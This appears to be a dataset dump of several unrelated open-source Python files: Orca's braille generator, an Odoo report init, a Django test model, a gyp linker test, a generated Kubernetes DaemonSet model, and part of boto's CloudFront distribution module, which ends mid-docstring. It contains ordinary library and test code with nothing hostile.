# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
"""Utilities for obtaining braille presentations for objects."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc."
__license__ = "LGPL"
import pyatspi
from . import braille
from . import debug
from . import generator
from . import messages
from . import object_properties
from . import orca_state
from . import settings
from . import settings_manager
from .braille_rolenames import shortRoleNames
_settingsManager = settings_manager.getManager()
class Space:
"""A dummy class to indicate we want to insert a space into an
utterance, but only if there is text prior to the space."""
def __init__(self, delimiter=" "):
self.delimiter = delimiter
SPACE = [Space()]
class BrailleGenerator(generator.Generator):
"""Takes accessible objects and produces a list of braille Regions
for those objects. See the generateBraille method, which is the
primary entry point. Subclasses can feel free to override/extend
the brailleGenerators instance field as they see fit."""
SKIP_CONTEXT_ROLES = (pyatspi.ROLE_MENU,
pyatspi.ROLE_MENU_BAR,
pyatspi.ROLE_PAGE_TAB_LIST,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_UNKNOWN,
pyatspi.ROLE_COMBO_BOX)
def __init__(self, script):
generator.Generator.__init__(self, script, "braille")
def _addGlobals(self, globalsDict):
"""Other things to make available from the formatting string.
"""
generator.Generator._addGlobals(self, globalsDict)
globalsDict['space'] = self.space
globalsDict['Component'] = braille.Component
globalsDict['Region'] = braille.Region
globalsDict['Text'] = braille.Text
globalsDict['Link'] = braille.Link
globalsDict['asString'] = self.asString
def _isCandidateFocusedRegion(self, obj, region):
if not isinstance(region, (braille.Component, braille.Text)):
return False
try:
sameRole = obj.getRole() == region.accessible.getRole()
sameName = obj.name == region.accessible.name
except:
msg = 'ERROR: Could not get names, roles for %s, %s' % (obj, region.accessible)
debug.println(debug.LEVEL_INFO, msg)
return False
return sameRole and sameName
def generateBraille(self, obj, **args):
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: generation disabled")
return [[], None]
if obj == orca_state.locusOfFocus \
and not args.get('formatType', None):
args['formatType'] = 'focused'
result = self.generate(obj, **args)
# We guess at the focused region. It's going to be a
# Component or Text region whose accessible is the same
# as the object we're generating braille for. There is
# a small hack-like thing here where we include knowledge
# that we represent the text area of editable comboboxes
# instead of the combobox itself. We also do the same
# for table cells because they sometimes have children
# that we present.
#
try:
focusedRegion = result[0]
except:
focusedRegion = None
try:
role = obj.getRole()
except:
role = None
for region in result:
if isinstance(region, (braille.Component, braille.Text)) \
and self._script.utilities.isSameObject(region.accessible, obj, True):
focusedRegion = region
break
elif isinstance(region, braille.Text) \
and role == pyatspi.ROLE_COMBO_BOX \
and region.accessible.parent == obj:
focusedRegion = region
break
elif isinstance(region, braille.Component) \
and role == pyatspi.ROLE_TABLE_CELL \
and region.accessible.parent == obj:
focusedRegion = region
break
else:
candidates = list(filter(lambda x: self._isCandidateFocusedRegion(obj, x), result))
msg = 'INFO: Could not determine focused region. Candidates: %i' % len(candidates)
debug.println(debug.LEVEL_INFO, msg)
if len(candidates) == 1:
focusedRegion = candidates[0]
return [result, focusedRegion]
#####################################################################
# #
# Name, role, and label information #
# #
#####################################################################
def _generateRoleName(self, obj, **args):
"""Returns the role name for the object in an array of strings, with
the exception that the pyatspi.ROLE_UNKNOWN role will yield an
empty array. Note that a 'role' attribute in args will
override the accessible role of the obj.
"""
if args.get('isProgressBarUpdate') \
and not _settingsManager.getSetting('brailleProgressBarUpdates'):
return []
result = []
role = args.get('role', obj.getRole())
verbosityLevel = _settingsManager.getSetting('brailleVerbosityLevel')
doNotPresent = [pyatspi.ROLE_UNKNOWN,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_FILLER,
pyatspi.ROLE_EXTENDED,
pyatspi.ROLE_LINK]
# egg-list-box, e.g. privacy panel in gnome-control-center
if obj.parent and obj.parent.getRole() == pyatspi.ROLE_LIST_BOX:
doNotPresent.append(obj.getRole())
if verbosityLevel == settings.VERBOSITY_LEVEL_BRIEF:
doNotPresent.extend([pyatspi.ROLE_ICON, pyatspi.ROLE_CANVAS])
if role == pyatspi.ROLE_HEADING:
level = self._script.utilities.headingLevel(obj)
result.append(object_properties.ROLE_HEADING_LEVEL_BRAILLE % level)
elif verbosityLevel == settings.VERBOSITY_LEVEL_VERBOSE \
and not args.get('readingRow', False) and role not in doNotPresent:
result.append(self.getLocalizedRoleName(obj, **args))
return result
def getLocalizedRoleName(self, obj, **args):
"""Returns the localized name of the given Accessible object; the name
is suitable to be brailled.
Arguments:
- obj: an Accessible object
"""
if _settingsManager.getSetting('brailleRolenameStyle') \
== settings.BRAILLE_ROLENAME_STYLE_SHORT:
role = args.get('role', obj.getRole())
rv = shortRoleNames.get(role)
if rv:
return rv
return super().getLocalizedRoleName(obj, **args)
def _generateUnrelatedLabels(self, obj, **args):
result = []
labels = self._script.utilities.unrelatedLabels(obj)
for label in labels:
name = self._generateName(label, **args)
result.extend(name)
return result
#####################################################################
# #
# Keyboard shortcut information #
# #
#####################################################################
def _generateAccelerator(self, obj, **args):
"""Returns an array of strings (and possibly voice and audio
specifications) that represent the accelerator for the object,
or an empty array if no accelerator can be found.
"""
verbosityLevel = _settingsManager.getSetting('brailleVerbosityLevel')
if verbosityLevel == settings.VERBOSITY_LEVEL_BRIEF:
return []
result = []
[mnemonic, shortcut, accelerator] = \
self._script.utilities.mnemonicShortcutAccelerator(obj)
if accelerator:
result.append("(" + accelerator + ")")
return result
#####################################################################
# #
# Hierarchy and related dialog information #
# #
#####################################################################
def _generateAlertAndDialogCount(self, obj, **args):
"""Returns an array of strings that says how many alerts and dialogs
are associated with the application for this object. [[[WDW -
I wonder if this string should be moved to settings.py.]]]
"""
result = []
try:
alertAndDialogCount = \
self._script.utilities.unfocusedAlertAndDialogCount(obj)
except:
alertAndDialogCount = 0
if alertAndDialogCount > 0:
result.append(messages.dialogCountBraille(alertAndDialogCount))
return result
def _generateAncestors(self, obj, **args):
"""Returns an array of strings (and possibly voice and audio
specifications) that represent the text of the ancestors for
the object. This is typically used to present the context for
an object (e.g., the names of the window, the panels, etc.,
that the object is contained in). If the 'priorObj' attribute
of the args dictionary is set, only the differences in
ancestry between the 'priorObj' and the current obj will be
computed. The 'priorObj' is typically set by Orca to be the
previous object with focus.
"""
result = []
if not _settingsManager.getSetting('enableBrailleContext'):
return result
args['includeContext'] = False
# Radio button group names are treated separately from the
# ancestors. However, they can appear in the ancestry as a
# labeled panel. So, we need to exclude the first one of
# these things we come across. See also the
# generator.py:_generateRadioButtonGroup method that is
# used to find the radio button group name.
#
role = args.get('role', obj.getRole())
excludeRadioButtonGroup = role == pyatspi.ROLE_RADIO_BUTTON
parent = obj.parent
if parent and (parent.getRole() in self.SKIP_CONTEXT_ROLES):
parent = parent.parent
while parent and (parent.parent != parent):
parentResult = []
# [[[TODO: WDW - we might want to include more things here
# besides just those things that have labels. For example,
# page tab lists might be a nice thing to include. Logged
# as bugzilla bug 319751.]]]
#
try:
role = parent.getRole()
except:
role = None
if role and role != pyatspi.ROLE_FILLER \
and role != pyatspi.ROLE_SECTION \
and role != pyatspi.ROLE_SPLIT_PANE \
and role != pyatspi.ROLE_DESKTOP_FRAME \
and not self._script.utilities.isLayoutOnly(parent):
args['role'] = role
parentResult = self.generate(parent, **args)
# [[[TODO: HACK - we've discovered oddness in hierarchies
# such as the gedit Edit->Preferences dialog. In this
# dialog, we have labeled groupings of objects. The
# grouping is done via a FILLER with two children - one
# child is the overall label, and the other is the
# container for the grouped objects. When we detect this,
# we add the label to the overall context.]]]
#
if role in [pyatspi.ROLE_FILLER, pyatspi.ROLE_PANEL]:
label = self._script.utilities.displayedLabel(parent)
if label and len(label) and not label.isspace():
if not excludeRadioButtonGroup:
args['role'] = parent.getRole()
parentResult = self.generate(parent, **args)
else:
excludeRadioButtonGroup = False
if result and parentResult:
result.append(braille.Region(" "))
result.extend(parentResult)
if role == pyatspi.ROLE_EMBEDDED:
break
parent = parent.parent
result.reverse()
return result
def _generateFocusedItem(self, obj, **args):
result = []
role = args.get('role', obj.getRole())
if role not in [pyatspi.ROLE_LIST, pyatspi.ROLE_LIST_BOX]:
return result
if 'Selection' in pyatspi.listInterfaces(obj):
items = self._script.utilities.selectedChildren(obj)
else:
items = [self._script.utilities.focusedChild(obj)]
if not (items and items[0]):
return result
for item in map(self._generateName, items):
result.extend(item)
return result
def _generateStatusBar(self, obj, **args):
statusBar = self._script.utilities.statusBar(obj)
if not statusBar:
return []
items = self._script.utilities.statusBarItems(obj)
if not items or items == [statusBar]:
return []
result = []
for child in items:
childResult = self.generate(child, includeContext=False)
if childResult:
result.extend(childResult)
result.append(braille.Region(" "))
return result
def _generateListBoxItemWidgets(self, obj, **args):
widgetRoles = [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_PUSH_BUTTON,
pyatspi.ROLE_RADIO_BUTTON,
pyatspi.ROLE_SLIDER,
pyatspi.ROLE_TOGGLE_BUTTON]
isWidget = lambda x: x and x.getRole() in widgetRoles
result = []
if obj.parent and obj.parent.getRole() == pyatspi.ROLE_LIST_BOX:
widgets = self._script.utilities.findAllDescendants(obj, isWidget)
for widget in widgets:
result.extend(self.generate(widget, includeContext=False))
result.append(braille.Region(" "))
return result
def _generateProgressBarIndex(self, obj, **args):
if not args.get('isProgressBarUpdate') \
or not self._shouldPresentProgressBarUpdate(obj, **args):
return []
acc, updateTime, updateValue = self._getMostRecentProgressBarUpdate()
if acc != obj:
number, count = self.getProgressBarNumberAndCount(obj)
return ['%s' % number]
return []
def _generateProgressBarValue(self, obj, **args):
if args.get('isProgressBarUpdate') \
and not self._shouldPresentProgressBarUpdate(obj, **args):
return []
return self._generatePercentage(obj, **args)
def _generatePercentage(self, obj, **args):
percent = self._script.utilities.getValueAsPercent(obj)
if percent is not None:
return ['%s%%' % percent]
return []
def _getProgressBarUpdateInterval(self):
interval = _settingsManager.getSetting('progressBarBrailleInterval')
if interval is None:
return super()._getProgressBarUpdateInterval()
return int(interval)
def _shouldPresentProgressBarUpdate(self, obj, **args):
if not _settingsManager.getSetting('brailleProgressBarUpdates'):
return False
return super()._shouldPresentProgressBarUpdate(obj, **args)
#####################################################################
# #
# Unfortunate hacks. #
# #
#####################################################################
def _generateAsPageTabOrScrollPane(self, obj, **args):
"""If this scroll pane is labelled by a page tab, then return the page
tab information for the braille context instead. Thunderbird
folder properties is such a case. See bug #507922 for more
details.
"""
result = []
labels = self._script.utilities.labelsForObject(obj)
for label in labels:
result.extend(self.generate(label, **args))
break
if not result:
# NOTE: there is no REAL_ROLE_SCROLL_PANE in formatting.py
            # because we currently fall back to the default formatting.
# We will provide the support for someone to override this,
# however, so we use REAL_ROLE_SCROLL_PANE here.
#
oldRole = self._overrideRole('REAL_ROLE_SCROLL_PANE', args)
result.extend(self.generate(obj, **args))
self._restoreRole(oldRole, args)
return result
def _generateIncludeContext(self, obj, **args):
"""Returns True or False to indicate whether context should be
included or not.
"""
if args.get('isProgressBarUpdate'):
return False
# For multiline text areas, we only show the context if we
# are on the very first line. Otherwise, we show only the
# line.
#
include = _settingsManager.getSetting('enableBrailleContext')
if not include:
return include
try:
text = obj.queryText()
except NotImplementedError:
text = None
if text and (self._script.utilities.isTextArea(obj) \
or (obj.getRole() in [pyatspi.ROLE_LABEL])):
try:
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset, pyatspi.TEXT_BOUNDARY_LINE_START)
except:
return include
include = startOffset == 0
if include:
for relation in obj.getRelationSet():
if relation.getRelationType() \
== pyatspi.RELATION_FLOWS_FROM:
include = not self._script.utilities.\
isTextArea(relation.getTarget(0))
return include
#####################################################################
# #
# Other things for spacing #
# #
#####################################################################
def _generateEol(self, obj, **args):
result = []
if not _settingsManager.getSetting('disableBrailleEOL'):
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'eol'
result.append(self._script.formatting.getString(**args))
return result
def space(self, delimiter=" "):
if delimiter == " ":
return SPACE
else:
return [Space(delimiter)]
def asString(self, content, delimiter=" "):
combined = ""
prior = None
if isinstance(content, str):
combined = content
elif content and isinstance(content, list):
# Strip off leading and trailing spaces.
#
while content and isinstance(content[0], Space):
content = content[1:]
while content and isinstance(content[-1], Space):
content = content[0:-1]
for element in content:
if isinstance(element, Space) and prior:
combined += element.delimiter
prior = None
else:
prior = self.asString(element)
combined = self._script.utilities.appendString(
combined, prior, delimiter)
return combined
|
darmaa/odoo | refs/heads/master | addons/account_followup/report/__init__.py | 447 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_followup_print
import account_followup_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rlugojr/django | refs/heads/master | tests/from_db_value/models.py | 26 | import decimal
from django.db import models
class Cash(decimal.Decimal):
currency = 'USD'
def __str__(self):
        s = super().__str__()
return '%s %s' % (s, self.currency)
class CashField(models.DecimalField):
def __init__(self, **kwargs):
kwargs['max_digits'] = 20
kwargs['decimal_places'] = 2
super().__init__(**kwargs)
def from_db_value(self, value, expression, connection, context):
cash = Cash(value)
cash.vendor = connection.vendor
return cash
class CashModel(models.Model):
cash = CashField()
def __str__(self):
return str(self.cash)
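# A minimal usage sketch, assuming a configured Django project with these
# test models installed:
#
#     CashModel.objects.create(cash='12.50')
#     instance = CashModel.objects.get()
#     instance.cash    # a Cash value, tagged with the connection vendor
#     str(instance)    # '12.50 USD'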
|
scripni/rethinkdb | refs/heads/next | external/v8_3.30.33.16/build/gyp/test/win/gyptest-link-fixed-base.py | 344 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure fixed base setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('fixed-base.gyp', chdir=CHDIR)
test.build('fixed-base.gyp', test.ALL, chdir=CHDIR)
def GetHeaders(exe):
full_path = test.built_file_path(exe, chdir=CHDIR)
return test.run_dumpbin('/headers', full_path)
# For exe, default is fixed, for dll, it's not fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_default_exe.exe'):
test.fail_test()
if 'Relocations stripped' in GetHeaders('test_fixed_default_dll.dll'):
test.fail_test()
# Explicitly not fixed.
if 'Relocations stripped' in GetHeaders('test_fixed_no.exe'):
test.fail_test()
# Explicitly fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_yes.exe'):
test.fail_test()
test.pass_test()
|
mbohlool/client-python | refs/heads/master | kubernetes/client/models/v1beta2_daemon_set.py | 1 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta2DaemonSet(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1beta2DaemonSetSpec',
'status': 'V1beta2DaemonSetStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None):
"""
V1beta2DaemonSet - a model defined in Swagger
"""
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""
Gets the api_version of this V1beta2DaemonSet.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta2DaemonSet.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta2DaemonSet.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta2DaemonSet.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1beta2DaemonSet.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta2DaemonSet.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta2DaemonSet.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta2DaemonSet.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta2DaemonSet.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:return: The metadata of this V1beta2DaemonSet.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta2DaemonSet.
Standard object's metadata. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:param metadata: The metadata of this V1beta2DaemonSet.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""
Gets the spec of this V1beta2DaemonSet.
The desired behavior of this daemon set. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The spec of this V1beta2DaemonSet.
:rtype: V1beta2DaemonSetSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""
Sets the spec of this V1beta2DaemonSet.
The desired behavior of this daemon set. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param spec: The spec of this V1beta2DaemonSet.
:type: V1beta2DaemonSetSpec
"""
self._spec = spec
@property
def status(self):
"""
Gets the status of this V1beta2DaemonSet.
The current status of this daemon set. This data may be out of date by some window of time. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:return: The status of this V1beta2DaemonSet.
:rtype: V1beta2DaemonSetStatus
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this V1beta2DaemonSet.
The current status of this daemon set. This data may be out of date by some window of time. Populated by the system. Read-only. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status
:param status: The status of this V1beta2DaemonSet.
:type: V1beta2DaemonSetStatus
"""
self._status = status
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta2DaemonSet):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
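# A minimal usage sketch; assumes V1ObjectMeta is importable from the same
# generated client package:
#
#     from kubernetes.client import V1ObjectMeta
#     ds = V1beta2DaemonSet(api_version='apps/v1beta2', kind='DaemonSet',
#                           metadata=V1ObjectMeta(name='fluentd'))
#     ds.to_dict()['api_version']   # 'apps/v1beta2'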
|
jvanbrug/alanaldavista | refs/heads/master | boto/cloudfront/distribution.py | 5 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import uuid
import base64
import time
from boto.compat import json
from boto.cloudfront.identity import OriginAccessIdentity
from boto.cloudfront.object import Object, StreamingObject
from boto.cloudfront.signers import ActiveTrustedSigners, TrustedSigners
from boto.cloudfront.logging import LoggingInfo
from boto.cloudfront.origin import S3Origin, CustomOrigin
from boto.s3.acl import ACL
class DistributionConfig(object):
def __init__(self, connection=None, origin=None, enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, default_root_object=None,
logging=None):
"""
:param origin: Origin information to associate with the
distribution. If your distribution will use
an Amazon S3 origin, then this should be an
S3Origin object. If your distribution will use
a custom origin (non Amazon S3), then this
should be a CustomOrigin object.
:type origin: :class:`boto.cloudfront.origin.S3Origin` or
:class:`boto.cloudfront.origin.CustomOrigin`
:param enabled: Whether the distribution is enabled to accept
end user requests for content.
:type enabled: bool
:param caller_reference: A unique number that ensures the
request can't be replayed. If no
caller_reference is provided, boto
will generate a type 4 UUID for use
as the caller reference.
        :type caller_reference: str
:param cnames: A CNAME alias you want to associate with this
distribution. You can have up to 10 CNAME aliases
per distribution.
        :type cnames: list of str
:param comment: Any comments you want to include about the
distribution.
:type comment: str
:param trusted_signers: Specifies any AWS accounts you want to
permit to create signed URLs for private
content. If you want the distribution to
use signed URLs, this should contain a
TrustedSigners object; if you want the
distribution to use basic URLs, leave
this None.
:type trusted_signers: :class`boto.cloudfront.signers.TrustedSigners`
:param default_root_object: Designates a default root object.
Only include a DefaultRootObject value
if you are going to assign a default
root object for the distribution.
        :type default_root_object: str
:param logging: Controls whether access logs are written for the
distribution. If you want to turn on access logs,
this should contain a LoggingInfo object; otherwise
it should contain None.
:type logging: :class`boto.cloudfront.logging.LoggingInfo`
"""
self.connection = connection
self.origin = origin
self.enabled = enabled
if caller_reference:
self.caller_reference = caller_reference
else:
self.caller_reference = str(uuid.uuid4())
self.cnames = []
if cnames:
self.cnames = cnames
self.comment = comment
self.trusted_signers = trusted_signers
self.logging = logging
self.default_root_object = default_root_object
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<DistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self></Self>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
if self.default_root_object:
dro = self.default_root_object
s += '<DefaultRootObject>%s</DefaultRootObject>\n' % dro
s += '</DistributionConfig>\n'
return s
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'Logging':
self.logging = LoggingInfo()
return self.logging
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
else:
return None
def endElement(self, name, value, connection):
if name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'CallerReference':
self.caller_reference = value
elif name == 'DefaultRootObject':
self.default_root_object = value
else:
setattr(self, name, value)
class StreamingDistributionConfig(DistributionConfig):
def __init__(self, connection=None, origin='', enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, logging=None):
super(StreamingDistributionConfig, self).__init__(connection=connection,
origin=origin, enabled=enabled,
caller_reference=caller_reference,
cnames=cnames, comment=comment,
trusted_signers=trusted_signers,
logging=logging)
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<StreamingDistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self/>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
s += '</StreamingDistributionConfig>\n'
return s
class DistributionSummary(object):
def __init__(self, connection=None, domain_name='', id='',
last_modified_time=None, status='', origin=None,
cname='', comment='', enabled=False):
self.connection = connection
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.origin = origin
self.enabled = enabled
self.cnames = []
if cname:
self.cnames.append(cname)
self.comment = comment
self.trusted_signers = None
self.etag = None
self.streaming = False
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'Status':
self.status = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'DomainName':
self.domain_name = value
elif name == 'Origin':
self.origin = value
elif name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'StreamingDistributionSummary':
self.streaming = True
else:
setattr(self, name, value)
def get_distribution(self):
return self.connection.get_distribution_info(self.id)
class StreamingDistributionSummary(DistributionSummary):
def get_distribution(self):
return self.connection.get_streaming_distribution_info(self.id)
class Distribution(object):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
self.connection = connection
self.config = config
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.in_progress_invalidation_batches = 0
self.active_signers = None
self.etag = None
self._bucket = None
self._object_class = Object
def startElement(self, name, attrs, connection):
if name == 'DistributionConfig':
self.config = DistributionConfig()
return self.config
elif name == 'ActiveTrustedSigners':
self.active_signers = ActiveTrustedSigners()
return self.active_signers
else:
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'Status':
self.status = value
elif name == 'InProgressInvalidationBatches':
self.in_progress_invalidation_batches = int(value)
elif name == 'DomainName':
self.domain_name = value
else:
setattr(self, name, value)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the Distribution. The only values
of the DistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set ``Distribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the Distribution is active or not.
:type cnames: list of str
:param cnames: The DNS CNAME's associated with this
